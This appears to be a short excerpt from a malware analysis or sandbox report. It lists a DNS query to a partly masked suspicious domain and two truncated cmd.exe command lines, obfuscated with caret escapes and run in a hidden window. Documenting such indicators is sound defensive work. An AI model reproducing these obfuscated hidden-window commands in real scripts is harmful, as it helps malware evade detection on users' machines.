Technical Information
- DNS ASK ss####ahotie.top
- '<SYSTEM32>\cmd.exe' /c cD %loCaLAppdAtA%.ExE^^THEDzuD^o^RD^o^g^YF^PudXyRemATeWgu^jiZmeREwUTWyBp^YcY^v^CijDUmnO^v^BOJNuh^O^z^oVbY^p^s^U^LdA^S^OJniFi^RFAtJyF^ucO^v^eg^I^K^ECNa^xjab^Fu^ZC^yHU^KHypY^bAG^rY^t^lULIQAQ^e...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cD %loCaLAppdAtA%.ExE^^THEDzuD^o^RD^o^g^YF^PudXyRemATeWgu^jiZmeREwUTWyBp^YcY^v^CijDUmnO^v^BOJNuh^O^z^oVbY^p^s^U^LdA^S^OJniFi^RFAtJyF^ucO^v^eg^I^K^ECNa^xjab^Fu^ZC^yHU^KHypY^bAG^rY^t^lULIQAQ^e...